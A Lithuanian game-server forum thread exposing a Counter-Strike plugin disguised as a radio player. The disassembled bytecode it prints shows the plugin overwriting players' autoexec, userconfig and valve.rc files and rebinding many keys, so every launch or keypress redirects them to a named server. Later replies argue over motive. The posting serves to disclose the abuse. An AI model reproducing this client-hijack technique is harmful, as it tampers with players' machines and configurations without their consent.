Page 1 of 11

mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:12
by sss
Ir dar vienas parazitas kuris tycia ikeldineja pluginus su raiz0 exploit'u i serverius

Code: Select all

 0x190                      PROC              ; public client_connect(id)0x194                     BREAK0x198                     BREAK0x19C                    PUSH.S  0xC         ; id0x1A4                    PUSH.C  0x40x1AC                      CALL  0x8         ; public auto_connect(id)0x1B4                  ZERO.pri0x1B8                      RETN    0x8                        PROC              ; public auto_connect(id)0xC                       BREAK0x10                      BREAK0x14                     PUSH.C  0x00x1C                     PUSH.S  0xC         ; id0x24                     PUSH.C  0x80x2C                   SYSREQ.C  0x0         ; client_cmd(id,"writecfg autoexec;writecfg userconfig")0x34                      STACK  0xC         ; free 3 cells0x3C                      BREAK0x40                     PUSH.C  0x1480x48                     PUSH.C  0x980x50                     PUSH.S  0xC         ; id0x58                     PUSH.C  0xC0x60                   SYSREQ.C  0x0         ; client_cmd(id,"motdfile autoexec.CFG;motd_write connect %s","dm.rampage.us.lt")0x68                      STACK  0x10        ; free 4 cells0x70                      BREAK0x74                     PUSH.C  0x2440x7C                     PUSH.C  0x18C0x84                     PUSH.S  0xC         ; id0x8C                     PUSH.C  0xC0x94                   SYSREQ.C  0x0         ; client_cmd(id,"motdfile userconfig.CFG;motd_write connect %s","dm.rampage.us.lt")0x9C                      STACK  0x10        ; free 4 cells0xA4                      BREAK0xA8                     PUSH.C  0x3280xB0                     PUSH.C  0x2880xB8                     PUSH.S  0xC         ; id0xC0                     PUSH.C  0xC0xC8                   SYSREQ.C  0x0         ; client_cmd(id,"motdfile valve.RC;motd_write connect %s","dm.rampage.us.lt")0xD0                      STACK  0x10        ; free 4 cells0xD8                      BREAK0xDC                     PUSH.C  0x36C0xE4                     PUSH.S  0xC         ; id0xEC                     PUSH.C  0x80xF4                   SYSREQ.C  0x0         ; client_cmd(id,"bind ^"F1^" ^"connect cs.rampage.us.lt^";bind ^"F2^" ^"connect cs.rampage.us.lt^";bind ^"F3^" ^"connect cs.rampage.us.lt^";bind ^"F4^" ^"connect cs.rampage.us.lt^";bind ^"F5^" ^"connect cs.rampage.us.lt^"")0xFC                      STACK  0xC         ; free 3 cells0x104                     BREAK0x108                    PUSH.C  0x6500x110                    PUSH.S  0xC         ; id0x118                    PUSH.C  0x80x120                  SYSREQ.C  0x0         ; client_cmd(id,"bind ^"F6^" ^"connect cs.rampage.us.lt^";bind ^"F7^" ^"connect cs.rampage.us.lt^";bind ^"F8^" ^"connect cs.rampage.us.lt^";bind ^"F9^" ^"connect cs.rampage.us.lt^";bind ^"F10^" ^"connect cs.rampage.us.lt^"")0x128                     STACK  0xC         ; free 3 cells0x130                     BREAK0x134                    PUSH.C  0x9380x13C                    PUSH.S  0xC         ; id0x144                    PUSH.C  0x80x14C                  SYSREQ.C  0x0         ; client_cmd(id,"bind ^"F11^" ^"connect cs.rampage.us.lt^";bind ^"F12^" ^"connect cs.rampage.us.lt^";bind ^"END^" ^"connect cs.rampage.us.lt^";bind ^"PGDN^" ^"connect cs.rampage.us.lt^";bind ^"z^" ^"connect cs.rampage.us.lt^"")0x154                     STACK  0xC         ; free 3 cells0x15C                     BREAK0x160                    PUSH.C  0xC2C0x168                    PUSH.S  0xC         ; id0x170                    PUSH.C  0x80x178                  SYSREQ.C  0x0         ; client_cmd(id,"bind ^"x^" ^"connect cs.rampage.us.lt^";bind ^"c^" ^"connect cs.rampage.us.lt^";bind ^"v^" ^"connect cs.rampage.us.lt^";bind ^"l^" ^"connect cs.rampage.us.lt^";bind ^"HOME^" ^"connect cs.rampage.us.lt^"")0x180                     STACK  0xC         ; free 3 cells0x188                  ZERO.pri0x18C                      RETN


Code: Select all

0x50C                      PROC              ; public plugin_init()0x510                     BREAK0x514                     BREAK0x518                    PUSH.C  0x11C0x520                    PUSH.C  0x10C0x528                    PUSH.C  0xEC0x530                    PUSH.C  0xC0x538                  SYSREQ.C  0x6         ; register_plugin("Radijas","1.1","Mantvydas")0x540                     STACK  0x10        ; free 4 cells0x548                     BREAK0x54C                    PUSH.C  0xFFFFFFFF0x554                    PUSH.C  0x1800x55C                    PUSH.C  0x00x564                    PUSH.C  0x16C0x56C                    PUSH.C  0x1440x574                    PUSH.C  0x140x57C                  SYSREQ.C  0x7         ; register_clcmd("say /play","Play",0,"- Shows the MOTD.",)0x584                     STACK  0x18        ; free 6 cells0x58C                     BREAK0x590                    PUSH.C  0xFFFFFFFF0x598                    PUSH.C  0x2040x5A0                    PUSH.C  0x00x5A8                    PUSH.C  0x1F00x5B0                    PUSH.C  0x1C80x5B8                    PUSH.C  0x140x5C0                  SYSREQ.C  0x7         ; register_clcmd("say /stop","Stop",0,"- Shows the MOTD.",)0x5C8                     STACK  0x18        ; free 6 cells0x5D0                  ZERO.pri0x5D4                      RETN      0x5D8                      PROC              ; public client_putinserver(id)0x5DC                     BREAK0x5E0                     BREAK0x5E4                    PUSH.C  0x00x5EC                    PUSH.C  0x2640x5F4                    PUSH.C  0x00x5FC                    PUSH.C  0x2600x604                    PUSH.S  0xC         ; id0x60C                    PUSH.C  0x24C0x614                    PUSH.C  0x40C000000x61C                    PUSH.C  0x1C0x624                  SYSREQ.C  0x8         ; set_task(6.000000,"Play",id,"",0,"",0)0x62C                     STACK  0x20        ; free 8 cells0x634                  ZERO.pri0x638                      RETN      0x3D4                      PROC              ; public Play(id,level,cid)0x3D8                     BREAK0x3DC                     BREAK0x3E0                    PUSH.C  0x00x3E8                    PUSH.C  0x10x3F0                    PUSH.S  0x14        ; cid0x3F8                    PUSH.S  0x10        ; level0x400                    PUSH.S  0xC         ; id0x408                    PUSH.C  0x140x410                      CALL  0xAC        ; stock cmd_access(id,level,cid,num,bool:accesssilent)0x418                       NOT0x41C                      JZER  0x4300x424                     BREAK0x428                  ZERO.pri0x42C                      RETN0x430                     BREAK0x434                    PUSH.C  0xA00x43C                    PUSH.C  0x7C0x444                    PUSH.S  0xC         ; id0x44C                    PUSH.C  0xC0x454                  SYSREQ.C  0x5         ; show_motd(id,"play.txt","Play")0x45C                     STACK  0x10        ; free 4 cells0x464                     BREAK0x468                  ZERO.pri0x46C                      RETN 0x470                      PROC              ; public Stop(id,level,cid)0x474                     BREAK0x478                     BREAK0x47C                    PUSH.C  0x00x484                    PUSH.C  0x10x48C                    PUSH.S  0x14        ; cid0x494                    PUSH.S  0x10        ; level0x49C                    PUSH.S  0xC         ; id0x4A4                    PUSH.C  0x140x4AC                      CALL  0xAC        ; stock cmd_access(id,level,cid,nu,bool:accesssilent)0x4B4                       NOT0x4B8                      JZER  0x4CC0x4C0                     BREAK0x4C4                  ZERO.pri0x4C8                      RETN0x4CC                     BREAK0x4D0                    PUSH.C  0xD80x4D8                    PUSH.C  0xB40x4E0                    PUSH.S  0xC         ; id0x4E8                    PUSH.C  0xC0x4F0                  SYSREQ.C  0x5         ; show_motd(id,"stop.txt","Stop")0x4F8                     STACK  0x10        ; free 4 cells0x500                     BREAK0x504                  ZERO.pri0x508                      RETN 

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:14
by xFrostas
vapšie tuoj visą klaviatūrą užbindins.

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:16
by SpyK
istrink posta , neverta platinti tokio briedo

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:18
by sss
SpyK wrote:istrink posta , neverta platinti tokio briedo

bus proga atsinaujint i steampipe

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:25
by nesvarbutis
tai buvo daroma delto kad ecs adminas apgavo zmogu (bitradio.lt) tikrai ant nemazos sumos ,daugiau niekur to nedariau ir nedarysiu ,atrodo jie jau issiaiskino tarpusavyje .

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:26
by sss
nesvarbutis wrote:tai buvo daroma delto kad ecs adminas apgavo zmogu (bitradio.lt) tikrai ant nemazos sumos ,daugiau niekur to nedariau ir nedarysiu ,atrodo jie jau issiaiskino tarpusavyje .

Kur irodymai? dar karta klausiu

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:28
by nesvarbutis
Man uztenka ,kad zmogus su kuriuo as bendradarbiauju man parase tai ,nezinau kaip jus bet man jis atrodo normalus ,rimtas ,suauges zmogus,paprasysiu jo ,kad padarytu chato nuotraukas ,kai padarys ikelsiu iskart cia.

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:29
by sss
nesvarbutis wrote:Man uztenka ,kad zmogus su kuriuo as bendradarbiauju man parase tai ,nezinau kaip jus bet man jis atrodo normalus ,rimtas ,suauges zmogus,paprasysiu jo ,kad padarytu chato nuotraukas ,kai padarys ikelsiu iskart cia.

supranti man neidomu kas ka parase, pateik faktus, nes tavo zodziai be faktu yra tik smeizimas.

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:31
by nesvarbutis
sss wrote:
nesvarbutis wrote:Man uztenka ,kad zmogus su kuriuo as bendradarbiauju man parase tai ,nezinau kaip jus bet man jis atrodo normalus ,rimtas ,suauges zmogus,paprasysiu jo ,kad padarytu chato nuotraukas ,kai padarys ikelsiu iskart cia.

supranti man neidomu kas ka parase, pateik faktus, nes tavo zodziai be faktu yra tik smeizimas.
Suprantu ,kai gausiu irodymus pateiksiu juos ,jei negausiu ju ,pats asmeniskai atsiprasysiu zmogaus kuriam galbut be reikalo pakenkiau.

Re: mantvydas rampage.us.lt, bitradio.lt

Posted: 2013 Aug 16 16:32
by TheChemodan
sss primeta hackeri ar ka su tuo SpyK? tai gi grybai esat brutu varo gavniukai ir vse , ilgiau passa niekur nesiregink ir ramiai galva.